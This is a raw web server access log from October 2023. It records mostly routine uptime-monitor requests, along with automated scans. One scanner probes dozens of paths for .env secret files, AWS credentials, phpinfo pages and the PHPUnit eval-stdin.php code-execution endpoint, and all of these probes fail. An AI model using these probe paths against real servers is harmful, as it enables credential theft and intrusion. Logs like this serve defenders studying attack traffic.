212.91.246.72 - - [04/Oct/2023:08:34:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.71 - - [04/Oct/2023:08:35:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
164.52.36.213 - - [04/Oct/2023:08:36:00 +0200] "\x16\x03\x01\x01 \x01" 400 329 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.180.143.71 - - [04/Oct/2023:08:36:03 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
164.52.36.213 - - [04/Oct/2023:08:36:09 +0200] "\x16\x03\x01\x01 \x01" 400 329 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.36.213 - - [04/Oct/2023:08:36:14 +0200] "\x16\x03\x01\x01 \x01" 400 329 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.36.213 - - [04/Oct/2023:08:36:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.36.213 - - [04/Oct/2023:08:36:19 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:08:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.107.166.15 - - [04/Oct/2023:08:37:23 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:08:37:28 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:08:37:29 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:08:37:37 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:08:37:38 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:08:37:41 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:08:37:42 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Oct/2023:08:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.79.172.21 - - [04/Oct/2023:08:38:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:08:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.170.247.37 - - [04/Oct/2023:08:44:56 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.247.37 - - [04/Oct/2023:08:45:07 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.247.37 - - [04/Oct/2023:08:45:10 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.247.37 - - [04/Oct/2023:08:45:16 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.247.37 - - [04/Oct/2023:08:45:18 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.247.37 - - [04/Oct/2023:08:45:24 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.247.37 - - [04/Oct/2023:08:45:25 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.247.37 - - [04/Oct/2023:08:45:30 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:08:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.170.247.37 - - [04/Oct/2023:08:45:55 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
107.170.247.37 - - [04/Oct/2023:08:46:04 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2023:08:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /wp-content/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /wp-admin/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /new/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /old/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /app/config/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /audio/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /cgi-bin/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /src/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /base/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:33 +0200] "GET /vendor/laravel/.env HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /protected/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /newsite/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /sites/all/libraries/mailchimp/.env HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /212.91.246.89/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /.remote HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /.local HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /.production HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /lab/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /cronlab/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /cron/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /core/app/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /core/Datavase/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /config/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /assets/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /sitemaps/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /saas/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /psnlink/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /exapi/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /en/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:34 +0200] "GET /tools/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /v1/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /v2/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /administrator/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /storage/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /__tests__/test-become/.env HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /redmine/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /gists/cache HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /uploads/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /lib/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /database/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /main/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /docs/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /client/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /.env.dev HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /blogs/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /shared/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /download/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /.env.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /site/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /sites/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:35 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /prod/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /oss HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /..staging/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /cronlab/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /configs/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /v0/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /v3/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:08:47:36 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:08:47:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:48:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:50:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:52:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:08:53:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
